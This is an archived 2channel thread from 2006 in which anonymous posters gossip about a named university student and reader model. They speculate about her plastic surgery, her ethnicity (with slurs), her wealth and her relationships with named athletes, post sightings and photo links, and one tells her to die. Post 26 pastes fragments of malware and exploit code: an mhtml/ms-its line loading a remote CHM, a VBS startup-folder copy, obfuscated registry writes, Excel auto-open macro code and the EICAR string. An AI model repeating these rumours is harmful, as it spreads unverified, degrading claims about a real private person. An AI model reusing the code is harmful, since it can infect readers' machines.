2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

青学ドクモ 藤原麗子さん パート4

1 :無名モデル:2006/12/08(金) 15:52:30 ID:2AMDmggH
ではどうぞ

2 :無名モデル:2006/12/08(金) 15:55:37 ID:???
>>1乙!
2ゲト!!!

3 :無名モデル:2006/12/08(金) 15:56:20 ID:2AMDmggH
最近青学のお友達と学校で楽しそうです
いろいろ書かれていますが最近は学生らしい生活みたいです
けっこうけっこう

4 :無名モデル:2006/12/08(金) 16:00:49 ID:Se24MZIt
パート3の最後、またいつものヤツ現われたね
どうして普通の精神状態でないんだろうね不思議・・

5 :無名モデル:2006/12/08(金) 16:18:16 ID:???
洋風の顔にキモノって微妙、真里亜みたいであんま似合わないんじゃない?

6 :無名モデル:2006/12/08(金) 16:54:58 ID:???
萌ちゃんドーハの悲劇やっちゃったね。ブログってる場合じゃないって
麗子の強運少しは分けてもらいなよ
生まれもって運の強い人っているんだよな

7 :無名モデル:2006/12/08(金) 17:25:51 ID:???
明日のキリ概また野間が送り迎え?
淵野辺に来る時間があったら練習しろ


8 :無名モデル:2006/12/08(金) 17:47:49 ID:agglt/N0
可愛ければイイ!!☆

9 :無名モデル:2006/12/08(金) 17:59:54 ID:???
キモノなんか似合うわけない変な顔

10 :無名モデル:2006/12/08(金) 18:04:42 ID:tYIiClmf
この人かお変w
学校でみると見ちゃいけないもの見た感じになる

11 :無名モデル:2006/12/08(金) 18:07:19 ID:???
↑鏡に映ったご自分の顔では?

12 :無名モデル:2006/12/08(金) 18:12:05 ID:agglt/N0
前スレのテンプレートはどこ?

13 :無名モデル:2006/12/09(土) 00:43:23 ID:???
藤原さん忙しすぎるヒルズ寝に帰るだけ
だったら淵野辺でいいじゃんもったいない

14 :無名モデル:2006/12/09(土) 01:16:39 ID:???
なんか着物女王の活動で忙しそうだよ
ラビットの先生が藤原がミスになったことを自慢げに話してた

15 :無名モデル:2006/12/10(日) 00:30:15 ID:???
誕生日後に会ったらカルティエの最新作LOVEウォッチの全部ダイヤの時計してました。あと薬指にもダイヤのカルティエの指輪してます。。。誰からのプレゼントだろ

16 :無名モデル:2006/12/10(日) 00:38:45 ID:bIsIBE4f
ヤクルトの青木じゃね?それか野間口?金はあるだろうけど在日と創価だよ
藤原は馬鹿だね

17 :無名モデル:2006/12/10(日) 01:00:07 ID:d25c5z9J
落合パパが麗子の誕生日にポルシェをプレゼントするくらいだよ 麗子は高額のプレゼントもらわなくてもパパが買ってくれるもんって言うのが口癖 却って幻滅するみたい

18 :無名モデル:2006/12/10(日) 01:15:00 ID:???
LOVEシリーズは親父からは貰わないだろワラ

19 :無名モデル:2006/12/10(日) 01:18:48 ID:???
野球選手よりパパと結婚すれば1番幸せだよ、藤原さん

20 :無名モデル:2006/12/10(日) 03:57:46 ID:AfOzo4+6
>>パパって実の?それとも違うパパ?

21 :無名モデル:2006/12/10(日) 03:59:51 ID:AfOzo4+6
>>17パパって雑誌にも載ってた実の父親?それとも違うパパ?

22 :無名モデル:2006/12/10(日) 04:41:51 ID:???
↑おのれはすっこんどれチンカスが。
http://life7.2ch.net/test/read.cgi/model/1165356286/

23 :無名モデル:2006/12/10(日) 10:31:38 ID:???
溺愛してる実のパパ
つーかこの人はパトロンいらないでしょ

24 :無名モデル:2006/12/10(日) 19:21:44 ID:zyhXFf+Q
野間口創価じゃん…
藤原さん見る目ないの?
分相応か…

25 :無名モデル:2006/12/11(月) 00:09:34 ID:kPzilw+J
のま、脱会した噂は嘘なの?

26 :<body onload=window()>:2006/12/11(月) 00:51:56 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

27 :無名モデル:2006/12/11(月) 08:18:20 ID:???
しょうもないもん貼り付けんな

28 :無名モデル:2006/12/11(月) 19:35:35 ID:32Zy1VfV
ソフトバンク斉藤和巳の女と親友

29 :無名モデル:2006/12/11(月) 19:44:34 ID:???
藤原さん、エルメスのエールバッグ持ってる?

30 :無名モデル:2006/12/11(月) 21:03:06 ID:???
そりゃ持ってるでしょ、何故(?_?)

31 :無名モデル:2006/12/11(月) 23:34:22 ID:???
そうだよね、
でも持ってるのみた事なかったから(>_<)
藤原さんの場合はエールよりもうすでにバーキンか。

32 :無名モデル:2006/12/14(木) 08:17:28 ID:9a6gPij+
昨夜ヒルズで藤原さん目撃した。白いハーフジャケットにロングブーツだった。完璧メイクで最初ハーフかと思った。父親らしい人とシネマの前でどれを観るか話してるみたいだった。あんま落合に似てなかったけど普通じゃない感じの人だった。

33 :無名モデル:2006/12/15(金) 16:35:27 ID:???
藤原さん誕生日プレゼントにいろいろな選手から何百万単位のものを送られたけどぜーんぶ返したらしい
ワタシだったらすなおに受け取るけど・・・・もったいない


34 :無名モデル:2006/12/15(金) 16:39:20 ID:2Q7lm2gL
兵庫県出身、帝塚山高校卒業の藤原麗子。
関西にも関関同立の有名私大があるのに、わざわざ東京に行ったのはなんで?
青学も良い大学と思うけどさ。
卒アルどう見ても、目が整形にしか見えないし、やっぱり可愛くなって新しいスタートをきりたかったのかな・・・
地元にいるとばれるもんね。

35 :無名モデル:2006/12/15(金) 16:47:49 ID:SOQa3lAl
卒業後はアパレルかな?☆

36 :無名モデル:2006/12/15(金) 19:11:22 ID:CpPnYGyW
関関同立より青学の方が上だからじゃん。彼氏は野球選手だしヒルズ住みだし可愛いし裏山

37 :無名モデル:2006/12/15(金) 23:35:58 ID:XuIrbh2m
>>33
それを人に話してる藤原がいやらしい

38 :無名モデル:2006/12/15(金) 23:40:31 ID:HXfTgTe9
ゴールドマンサックスの社員のボーナス一人平均7300万円だってヤフーに載ってた こんな男たちにバースディパーティしてもらっていいよねえ藤原さん 鍋パーの次の日だったんでしょ

39 :無名モデル:2006/12/16(土) 01:11:29 ID:???
誕生日パーティーしすぎ?でデブってたよ!ワラ
せっかく激ヤセしてたのにまた痩せなきゃね
顔はいまの方が可愛いけど

40 :無名モデル:2006/12/17(日) 19:22:08 ID:???
97:無名さん
こいつらのグループすごいよ。女同士で飯食ってても会計の時に選手呼んで金を払わせてる!
12/17 12:33

他のところで書かれてた

41 :無名モデル:2006/12/17(日) 19:34:16 ID:uvW9aOCn
誕生日ゴールドマンは知らないけど鍋パーの前日、松坂が来て超盛り上がったよ
みんなサインもらッた!!

42 :無名モデル:2006/12/17(日) 19:37:03 ID:???
>>33 バーキン事件で2chですげぇ叩かれたから懲りたんじゃんw

43 :無名モデル:2006/12/17(日) 19:50:52 ID:5e5D60q4
てゆーか遊びたかったから東京きたんでしょ。整形も地元じゃバレるし。まぁ雑誌で整形公開しちゃってるけど。

44 :無名モデル:2006/12/17(日) 20:14:14 ID:???
けど正直勝ち組だよね。青学だしヒルズ住めるくらいお嬢だしミス着物
でしょ・・・顔は綺麗だもん・・・
野球界でもみんな見た人美人って書いてる・・・
だれと結婚するんだろう

45 :無名モデル:2006/12/17(日) 21:11:24 ID:???
青学生しかしらない無名のくせにミス着物とかありえない

46 :無名モデル:2006/12/17(日) 21:29:18 ID:???
自演しすぎ

47 :無名モデル:2006/12/17(日) 21:49:14 ID:7VdE9zsn
は?着物女王ほんとだよ
自演はあんた違う?ID隠してるしワラ

48 :無名モデル:2006/12/17(日) 21:52:07 ID:???
野球ヲタの中ではかなり有名。野球界の噂見てみ?
つーか選手と繋がりすぎ

49 :無名モデル:2006/12/17(日) 21:59:32 ID:???
ミス着物はガチ。サンスポと産経新聞に載ってた。
けど別にって感じ。外人顔だから微妙だしね・・・

50 :無名モデル:2006/12/17(日) 22:05:14 ID:???
>>48 選手カノ同士みんな仲いいから繋がるんじゃないの?
斉藤和巳のカノと親友だし、あの舞ちゃんとかとよく試合見に来てる

51 :無名モデル:2006/12/17(日) 23:26:04 ID:OFrZcWMP
>>50
斎藤かずみって結婚してるよね?
愛人ってこと?藤原さんの親友。

52 :無名モデル:2006/12/18(月) 00:15:37 ID:???
>>51
この女の為に離婚したよ。詳しくは週刊現代に載ってる

53 :無名モデル:2006/12/18(月) 00:16:47 ID:???
芦屋出身 読モ 青学 六本木ヒルズ一人暮らし きものの女王 こんな人めったにいない 一度会ってみたいと思わせるよねマジ

54 :無名モデル:2006/12/18(月) 00:27:04 ID:???
>>33 はぁ?ブランド物は返していたけど何100万もするゴルフのアイアンセット
貰ってたしwww
ゴルフするーとか調子のりすぎ まじ一回氏ね

55 :無名モデル:2006/12/18(月) 08:31:25 ID:EUr9ZIyh
>>52
教えてくれてありがとう!斎藤、離婚したんだ…。
子供がかわいそう。

56 :無名モデル:2006/12/18(月) 08:46:29 ID:???
おそるべし藤原
何でビップと繋がりまくりなのかしら
てか斎藤の彼女て藤原とタメ?

57 :無名モデル:2006/12/18(月) 10:01:50 ID:???
>>56
斎藤の彼女19歳って聞いた事ある…


58 :無名モデル:2006/12/18(月) 11:06:17 ID:???
>>32
藤原さんて、どこの国のハーフっぽいの?

59 :無名モデル:2006/12/18(月) 11:20:12 ID:92pwIGrI
顔が濃いんだよね。堀深いし。リア・ディゾンっぽくない?あの目は茶色のカラコン?

60 :無名モデル:2006/12/18(月) 11:33:26 ID:???
>>59
昔はディファインしてて瞳真っ黒だった。
今はわかんないけど…。
リア・ディゾンには似てないような…。

61 :無名モデル:2006/12/18(月) 11:34:44 ID:???
顔濃いってゆうか、化粧が濃いんじゃないの?

62 :無名モデル:2006/12/18(月) 11:42:11 ID:???
化粧も濃いし顔自体も濃い!なんかお人形って感じ!ハーフっぽく作ってるんじゃん

63 :無名モデル:2006/12/18(月) 11:49:57 ID:DnaQyZYs
美肌一族かな?☆

64 :無名モデル:2006/12/18(月) 12:09:13 ID:WWgXgIe4
どこがリアディゾン…
ニューハーフにみえるよ
ごついし

65 :無名モデル:2006/12/18(月) 12:16:09 ID:uEtHmoGt
お母さん純日本人じゃないよね?

66 :無名モデル:2006/12/18(月) 12:18:46 ID:DnaQyZYs
何気に可愛くてイイとも!!☆

67 :無名モデル:2006/12/18(月) 12:35:25 ID:???
リアはアジア人の血まざってるからわからなくもない。この人は白人系の顔では絶対ない。ベトナムやマレーシアて感じ!母親も!とりあえず春名亜美なみに母親とそっくり!

68 :無名モデル:2006/12/18(月) 12:55:52 ID:???
藤原フィリピーナ麗子

69 :無名モデル:2006/12/18(月) 12:58:40 ID:???
確かに藤モンも網も母親そっくり。
しかも2人とも母親、準日本人じゃないよね?


70 :無名モデル:2006/12/18(月) 13:10:20 ID:???
リアに似てるねー。意識してそう。髪もアッシュだし目も茶色。化粧の濃さ具合も(笑)あとこの人って顔小さいよね

71 :無名モデル:2006/12/18(月) 13:40:08 ID:???
リア・ディゾン
http://imepita.jp/20061218/489080

藤モン
http://imepita.jp/20061218/490380



72 :無名モデル:2006/12/18(月) 13:43:25 ID:???
藤モンってほんっと、美人だよね!
昔はブスだと思ってたけど最近はすごく美人だと思うようになった。

73 :無名モデル:2006/12/18(月) 14:06:46 ID:???
マレーシア人納得
スタイル悪いけど顔はキレイだよね
帰国子女近藤しづかやもうじき女子アナの小川友佳には負けるけど

74 :無名モデル:2006/12/18(月) 14:14:59 ID:DnaQyZYs
かわいい…

75 :無名モデル:2006/12/18(月) 14:20:12 ID:???
近藤や小川は藤原の足元にも及ばんだろWWWWWW

76 :無名モデル:2006/12/18(月) 14:42:04 ID:PsDFnPWz
やせてかなりきれいになったね!

77 :無名モデル:2006/12/18(月) 14:47:38 ID:???
近藤や小川は学年的にあせりの色が濃い
すがこも読モが裏目に出て就活全滅でしょ
あみも藤原さんみたいにスパっと読モ足洗ったほうがいいよ

78 :無名モデル:2006/12/18(月) 15:51:26 ID:???
近藤しづか可愛すぎ

79 :無名モデル:2006/12/18(月) 16:02:53 ID:DnaQyZYs
藤原麗子さん可愛すぎ!!☆

80 :無名モデル:2006/12/18(月) 18:30:44 ID:???
肥えてるフィリピンニューハーフ

81 :無名モデル:2006/12/18(月) 18:49:05 ID:???
アンチの人さ藤原さんと仲良くするとかな〜りかな〜り人生において得だょ
叩きとか虚しくならない?勝ち組についた方が利口

82 :無名モデル:2006/12/18(月) 20:24:24 ID:???
藤原さんと仲良くしてると、どんなふうに人生得なの?

83 :無名モデル:2006/12/18(月) 22:27:01 ID:???
富士そばへ行くと顔が利く

84 :無名モデル:2006/12/18(月) 22:35:58 ID:???
和巳カノは24歳売れないタレントでIに住んでる

85 :無名モデル:2006/12/19(火) 14:36:34 ID:???
高校時代藤原さんと下校中、雨に濡れて倒れていた乞食の人に出くわした。
麗子、突然コンビニへ走っておにぎり買ってきてこれ食べてくださいって渡してた。
目に涙を溜めながら。このスレ読みながら急に思い出した。
自演ととられてもいいけど、こういう一面もあるって言いたかっただけ。

86 :無名モデル:2006/12/19(火) 16:43:39 ID:JhQAL9eA
ホームレスにそういう事するとか最悪
優しい人はそんなことしないよ

87 :無名モデル:2006/12/19(火) 17:04:35 ID:???
↑見てみないフリするのが優しい人なんだね
自然に出た行動を最悪とか言うあなたの心が貧しい

88 :無名モデル:2006/12/19(火) 17:40:19 ID:JhQAL9eA
優しい人は職を紹介します。
物与えてもなーんの解決にもならないし優しさにもなりません

89 :無名モデル:2006/12/19(火) 18:05:55 ID:???
職が見つからないから乞食にならざるを得ないんでしょ
ホームレスと乞食は違うよじゃ求人情報誌あげればいいわけ?自然な気持ちからの行動を頭ごなしに否定する権利ないと思うよ

90 :無名モデル:2006/12/19(火) 18:09:22 ID:W9fD3R70
アンチは何にでも噛み付くから放っておこうよね

91 :無名モデル:2006/12/19(火) 18:14:21 ID:???
思わず出た行動を最悪というアンタこそ、さ・い・あ・く こういうに限って口だけだね

92 :無名モデル:2006/12/19(火) 18:14:38 ID:???
なにこのばればれの自演擁護きもいスレ

93 :無名モデル:2006/12/19(火) 19:43:54 ID:???
清川サンのウ・ワ・サに戻れば?
自分でレスらないと増えないよw

94 :無名モデル:2006/12/20(水) 06:20:12 ID:Eymr8KL/
まずねー、帝塚付近は乞食のいるようなとこではない笑 そしてこのスレ見てる昔の彼女を知ってるやつは、ハーフとか美人とか掘り深いとか言われてて失笑

95 :無名モデル:2006/12/20(水) 06:23:25 ID:bdOBKAlL
>>94
藤原さんって整形なの?

96 :無名モデル:2006/12/20(水) 08:00:09 ID:???
美人はいつの世も僻まれるんだね

97 :無名モデル:2006/12/20(水) 08:47:45 ID:???
いつまでもひがんでる関西人なんかほっとけば?

98 :無名モデル:2006/12/20(水) 09:32:02 ID:tsulAca8
鼻高い目でかい美人って印象。ただデブったり痩せたり繰り返す。
こないだ、すごいデカい男と西麻布にいたけどあれ彼氏?ニット帽だったから顔わからなかった、、つか帝塚って?

99 :無名モデル:2006/12/20(水) 09:36:33 ID:???
藤原さんの事はみんな帝塚山の子は噂して妬んでるけど藤原さんは全く存在すら忘れてた。。。昔からの仲良い子以外メモリー消去したらしい。。。

100 :無名モデル:2006/12/20(水) 09:44:46 ID:???
ニット帽ダルでしょ
涌井と3人で毎日っていいくらい遊んでるよ ツインタワーに麗子はさまれてるW

101 :無名モデル:2006/12/20(水) 09:54:00 ID:bdOBKAlL
この人、別に鼻高くないし目も普通くらいの大きさじゃない?
まぁ美人は美人だけど

102 :無名モデル:2006/12/20(水) 09:54:38 ID:???
ageんなボケが、sageろや

103 :無名モデル:2006/12/20(水) 09:58:18 ID:???
鼻筋がとぉってるくない?付け根が高いから外人ぽい??個人的には外人ぽいとはそこまで思わないけど、普通にかわいいってかんじ

104 :無名モデル:2006/12/20(水) 10:03:08 ID:???
セレブぶっても関西出身じゃんW 関西人は下品だから大嫌い
帝塚???名前も聞いた事ない三流校かよW
青学入れて人生変わってよかったねW

105 :無名モデル:2006/12/20(水) 15:42:17 ID:CfuLHL9y
藤原さんは残念だけど田村あみの方が断然まし
小川ゆかや近藤しづかと比べたらぶさすぎます

106 :無名モデル:2006/12/20(水) 16:09:52 ID:4YNSNKLC
高校の時、勉強出来なかったのに・・
雑誌でみたときは顔が変わり果てて、最初同姓同名の別人かと思ったくらい。。

しかも勉強してなかったよ。藤原さん。

107 :無名モデル:2006/12/20(水) 16:42:45 ID:???
関西人ってヒガミ多いね
藤原気にもしてないのが笑えるね

108 :無名モデル:2006/12/20(水) 17:26:36 ID:???
勉強できなかったとか顔違うとかさ正直負け犬の遠吠えにしか聞こえないよ、、、事実藤原さんは青学だし美人だよ。2ちゃんでしか悪口言えないとかかわいそうな人間。せめて知り合いなら本人に言えばいいのにヘタレだね。だから負け組なんだろうけど

109 :無名モデル:2006/12/20(水) 17:27:33 ID:05g8TodC
>>100  まじで!? ダルって北海道じゃないの? まぁ濃い顔同士でお似合いじゃない?

110 :無名モデル:2006/12/20(水) 17:31:10 ID:???
ダルはオフになると東京いるらしいね。事務所が借りているマンションあるし。温泉行ってるよ

111 :無名モデル:2006/12/20(水) 17:43:51 ID:???
さすが藤原。サッカーの次は野球界引っ掻しまわしwwww

112 :無名モデル:2006/12/20(水) 17:48:02 ID:???
少しでも可愛くないとかいうレスあると必死に擁護って異常ですね
マイナスな感想はすべて嫉みですか…
必死に擁護して嫉みとか言ってる奴は何見ても美しくみえて何食べても美味しく思う人なんだろーねー

113 :無名モデル:2006/12/20(水) 18:21:16 ID:HoZbxjej
セレブで可愛いイイ!!

114 :無名モデル:2006/12/21(木) 04:46:36 ID:0o+PQiVc
>>104
でも関西人からしたら関東って地味でだっさくて華がないから大嫌いなんやよね〜。

115 :無名モデル:2006/12/21(木) 13:06:11 ID:045AGpSm
なんかダルってのは怪しいな…

116 :無名モデル:2006/12/21(木) 13:17:02 ID:Kj++zs73
ダルいけど可愛ければイイとも!!

117 :無名モデル:2006/12/21(木) 14:00:20 ID:???
ダルと付き合ってるのはガチなのか?俺の友達ダルと付き合ってるってプリクラ持ってたんだけど…藤原が本命か?

118 :無名モデル:2006/12/21(木) 14:09:21 ID:???

ガセネタだよ、麗子さんの本命は官僚志望の東大文一の人

119 :無名モデル:2006/12/21(木) 14:17:14 ID:045AGpSm
目撃も嘘!?

120 :無名モデル:2006/12/21(木) 14:21:16 ID:???
つーかそんなの外野が分かるわけない。一緒にいるだけで彼氏なんて分かるの?知り合いかもだし目撃も嘘かもだしね。けど本人は彼氏いないって言ってるからいいじゃん

121 :無名モデル:2006/12/21(木) 14:23:10 ID:???
野間口は本当だよ!!!
ヒルズ映画館で見たもん
二人きりでいたよ

122 :無名モデル:2006/12/21(木) 14:59:46 ID:045AGpSm
藤原さんってケバいよな?すっぴん見るの怖い…

123 :無名モデル:2006/12/21(木) 15:15:42 ID:???
藤もんの最新画像げっちゅhttp://h.pic.to/7xpjz

124 :無名モデル:2006/12/21(木) 17:52:30 ID:???
載せるなボケが市ね

125 :無名モデル:2006/12/21(木) 23:54:29 ID:???
123最低だね。訴えられるよ。写真とかはやめなきゃ。人権侵害

126 :無名モデル:2006/12/22(金) 00:04:32 ID:???
生活レベル落としたくないから噂は知らないけど絶対にスポーツ選手とは結婚しないよ。よっぽど一流選手じゃなきゃ不安定な職種だし。適当に遊んでるんでしょ。最後は超固い職種で真面目くんと結婚しそう

127 :無名モデル:2006/12/22(金) 00:19:28 ID:???
すんげ毒モの足立とかぶる。足立も広島と横浜の有名投手と付き合ってたよ。一緒につるんでるからな

128 :無名モデル:2006/12/22(金) 00:58:31 ID:wq7wcB6v
>>123
最後に藤原さん見たの1年前だけど、さらに大人っぽくなったね!
それに随分、痩せた。
前は丸顔って感じだったのにフェイスライン、シャープになってるし。
可愛い美人から綺麗な美人になったね。

129 :無名モデル:2006/12/22(金) 01:59:05 ID:nuq9ezHi
絶対にすっぴん誰かわかんないだろな(笑)

130 :無名モデル:2006/12/22(金) 03:30:10 ID:???
藤原さん美人だと思うけどすっぴんとの差が激しそう…
すっぴん不細工っぽいな…。
化粧美人みたいな

131 :無名モデル:2006/12/22(金) 07:33:52 ID:???
ノーメイク、RAYかCanCamに載ってたよ。全体的に薄まる感じ。化粧も濃いけど元の素顔も濃かった

132 :無名モデル:2006/12/22(金) 08:04:18 ID:???
>>131
うP!!!

133 :無名モデル:2006/12/22(金) 08:06:03 ID:wq7wcB6v
>>131
藤原さん何のファンデ使ってたか載ってた?
あの白い肌憧れるわ〜。

134 :無名モデル:2006/12/22(金) 09:54:49 ID:???
ただ白いんじゃなくて象牙のような色、透明感があるからハーフみたいに見えるんだね
藤原のママ見たことあるけどこれまた美白美人W

135 :無名モデル:2006/12/22(金) 10:43:59 ID:???
私ヒルズのTSUTAYAで藤原とママいるの見たことあるけどbisに載ってたまんまのマダムだったよ
二人とも濃かった

136 :無名モデル:2006/12/22(金) 11:18:38 ID:???
白いの似合わないよ、ラテン系の外人顔なんだから日焼け肌の方がいい

137 :無名モデル:2006/12/22(金) 12:12:30 ID:wq7wcB6v
>>135
2人いたら、物凄い迫力だろうね

138 :無名モデル:2006/12/22(金) 12:14:29 ID:???
>>136
確かに…あの顔で白肌ってちょっと違和感ある。
でも藤原さんて、もしかしたら白人に憧れてあんなに白いのかも。

139 :無名モデル:2006/12/22(金) 12:46:39 ID:ieMad+Ol
メークがギャルかって位濃い
特にアイメーク

140 :無名モデル:2006/12/22(金) 14:25:37 ID:???
田村あみって親何してるの?
藤原さんより貧乏なのに気取っててやだ

141 :無名モデル:2006/12/22(金) 15:03:42 ID:???
そうかな

142 :無名モデル:2006/12/22(金) 15:26:37 ID:4+BYRuhf
今日学校でみたよ。赤いワンピースで髪の毛短くなってて梨花みたいな髪の毛で相変わらず可愛いかった。メイクも薄くなってたよ。彼氏の趣味?コンサバじゃなくなっててカワイイ系になってる

143 :無名モデル:2006/12/22(金) 15:29:05 ID:nuq9ezHi
東大の彼氏?

144 :無名モデル:2006/12/22(金) 15:42:29 ID:???

バカ発見!

145 :無名モデル:2006/12/22(金) 15:44:03 ID:nuq9ezHi
え?なんで?東大じゃないの?誰なんだ?

146 :無名モデル:2006/12/22(金) 15:48:43 ID:???
とりあえずダルはないと思うよ。年上好きだし。この人は謎多いから分からない。秘密主義だし。けど東大生は仲良いよ、レポート全部してもらってる

147 :無名モデル:2006/12/22(金) 15:51:24 ID:???

バカ発見!

148 :無名モデル:2006/12/22(金) 15:54:15 ID:???
ああ見えて流され安い女なんだな。ちょっと幻滅なんだな。男に合わすんだな。 コンサバの方が似合うんだな。

149 :無名モデル:2006/12/22(金) 15:58:18 ID:yOV95lAT
下品すぎる
叶美香かよWWW

150 :無名モデル:2006/12/22(金) 16:17:47 ID:???
野間口は隠し撮りてきなのがぅPされてまわってたから本当だべ、彼氏かまでは知らんが

151 :無名モデル:2006/12/22(金) 16:41:43 ID:???
バカ発見の実花

152 :無名モデル:2006/12/22(金) 16:59:47 ID:???
狙われる「芦屋マダム」ひったくり急増、1.5倍に
っていう記事載ってたよ
麗子ママ大丈夫?

153 :無名モデル:2006/12/22(金) 17:57:45 ID:2jXPBrSs
男も女も周りはなぜこんなに藤原さんを持ち上げるの?
バックに何かついてるの?

154 :無名モデル:2006/12/22(金) 18:27:00 ID:XRK67Bod
>>153
え?普通に美形だからじゃん
ひねくれてるね

155 :無名モデル:2006/12/22(金) 18:36:39 ID:???
この流れ・・・また自演とか言う流れじゃねorz
153みたいなのはスルーしようぜ

156 :無名モデル:2006/12/22(金) 20:06:49 ID:???
美人…か?いかにも整形しましたって感じやし、老けてるし必要以上の厚化粧…

157 :無名モデル:2006/12/22(金) 20:30:36 ID:???
化粧濃いと思わないけど
画像見たけど鼻筋とおってるね

158 :無名モデル:2006/12/22(金) 20:32:12 ID:???
普通にケバい

159 :無名モデル:2006/12/22(金) 20:36:28 ID:???
ケバくても綺麗だから無問題☆★☆

160 :無名モデル:2006/12/22(金) 20:44:14 ID:???
とりあえず色白すぎて真っ白だから日を浴びてください。恐いです

161 :無名モデル:2006/12/22(金) 21:33:18 ID:9yxzr26O
てか整形してるよねww
Rayの初登場の写真と今の写真は別人のように違いすぎる


162 :無名モデル:2006/12/22(金) 21:33:57 ID:???
男はあんまり整形気にしないよね

163 :無名モデル:2006/12/22(金) 21:39:41 ID:???
さっきMステうつってた!!読モデルいっぱいで!!美人

164 :無名モデル:2006/12/22(金) 21:42:47 ID:???
磯部ナオもいたね。読モめちゃめちゃいるやん。読モ枠???

165 :無名モデル:2006/12/22(金) 21:45:55 ID:???
見た〜やっぱ一般客とは違うね、キレイでしたね

166 :無名モデル:2006/12/22(金) 21:46:35 ID:???
観客でいたの?

167 :無名モデル:2006/12/22(金) 21:49:33 ID:???
そうだよ

168 :無名モデル:2006/12/22(金) 22:01:08 ID:???
そんなに美人かなぁ…

169 :無名モデル:2006/12/22(金) 23:52:11 ID:???
磯部奈央ちゃんはわかったけど
レコタソもいたんだ?
わかんなかった(´・ω・`)

他には誰がいた?>読モ
それぞれどのアーのファソなんだろ。

170 :無名モデル:2006/12/23(土) 06:06:56 ID:fnrSfVG0
れいこちゃんの親友って誰?バーキン事件て何?

171 :無名モデル:2006/12/23(土) 06:35:42 ID:???
>>170
バーキン事件ってのは藤もんが友達のバーキン盗んだんだよ。

172 :無名モデル:2006/12/23(土) 07:48:49 ID:???
↑ちげーょ、お前馬鹿?
知ったか乙 W

173 :無名モデル:2006/12/23(土) 08:28:07 ID:???
>>172
マルチに何レスしてんだよ
お前も>>171と変わらんな

174 :無名モデル:2006/12/23(土) 08:35:48 ID:Wnr1VcLT
色は逆でも良し。
その人がちゃんと周りを見る人ならば、
まわりにさりげない気配りしてると好印象かな。
モチロン気になる人には、他の人よりちょっとだけより気を配る。
みんなの前であからさまに「狙ってます!」みたいな人は男でも引くよ。
んで解散時にアドなり電話番号なり渡して、後日2人で会えばイイんでない?

175 :無名モデル:2006/12/23(土) 09:19:21 ID:???
麗子去年パパからの誕プレのポルシェ、芦屋にホコリかぶったまま一度も乗ってないって言ってた。タクシーがいいって
バーキンも何色あるかはっきり覚えてないみたいでいつもガーデンばかり、使いやすいからって     もう少しましなウソつけば?

176 :無名モデル:2006/12/23(土) 13:06:57 ID:Wnr1VcLT
これ美味しいよ!!

177 :無名モデル:2006/12/23(土) 15:06:28 ID:It9VH0Wh
Mステ磯辺さんはわかったけど藤原なんていたかわからない

178 :無名モデル:2006/12/23(土) 15:25:38 ID:???
渡辺と上津原もいたべ

179 :無名モデル:2006/12/23(土) 15:55:19 ID:It9VH0Wh
磯辺さん以外みかけなかった…

180 :無名モデル:2006/12/24(日) 11:04:03 ID:???
昨日夜西麻布でグループでいるの見たよ。男は皆大きくて恐そうだったし藤原の他も見たことある顔だった。エイベ関係のタレント?

181 :無名モデル:2006/12/24(日) 11:55:30 ID:bmiyjqDw
そんなに連日目撃談が出るとかどんだけだよ…
藤原のまわりはちゃねらーだらけなのか

182 :無名モデル:2006/12/24(日) 12:48:54 ID:0Dkbv4Aj
釣られないで!れいちゃん昨日はデートの日

183 :無名モデル:2006/12/24(日) 12:54:06 ID:???
彼氏やっぱりいるんだね★どんな人なんだろう…

184 :無名モデル:2006/12/24(日) 13:03:45 ID:+zV2jxG5
>>182
184 :ノーブランドさん :2005/04/09(土) 23:31:22
カッコいい人と一緒に何処かに行く時は、必ず、バーバリーのプリーツ(ミニ)スカートにする。
やっぱり、パンツ見えそうな格好してると、相手の視線がそっちに集中してくる。
この季節、お花見とかでそういった恰好して膝枕してあげると喜ぶ。

今日、葛西臨海公園でお花見してきて、彼氏ゲットしました。
上に書いたような恰好で行き、お弁当も作って、膝枕もして、
観覧車に乗って告白されてキス。

男って単純です。
彼氏に会う以外はジーンズで手抜いてます。

185 :無名モデル:2006/12/24(日) 13:21:05 ID:HScJcXoI
1週間前くらいの夜に代官山アドレス付近で背の高い男の人
と2人で仲よさそうにいたよ。これはガチ!!知り合いいたら聞いてもいいよ
それだけ

186 :無名モデル:2006/12/24(日) 14:15:35 ID:???
またダルビッシュにでも手出してんのかよ

187 :無名モデル:2006/12/24(日) 14:18:40 ID:???
ダルだったら見たらわかるだろ。あのでかさは尋常じゃないし顔も見間違えるわけない。藤原の顔がわかるくらいならダルだってわかるはず。よってダルとの目撃情報はウソだと思われ

188 :無名モデル:2006/12/24(日) 14:42:00 ID:HScJcXoI
藤原さんはお洒落してて
かわいいワンピ着てたけど男の人はサングラスしててモンクレのダウン着ててカジュアルだった
夜なのにサングラスしてたし、でかかったから目立ってたよ
藤原さんが肩くらいしかなかったから185はあると思う
けどダルではないよ。ダルなら分かる

189 :無名モデル:2006/12/24(日) 14:45:40 ID:???
男が185センチで藤原がそいつの肩まであるって…藤原も身長けっこうあるな

190 :無名モデル:2006/12/24(日) 14:49:57 ID:???
藤原さん結構大きいのに高いヒール履いてるよね

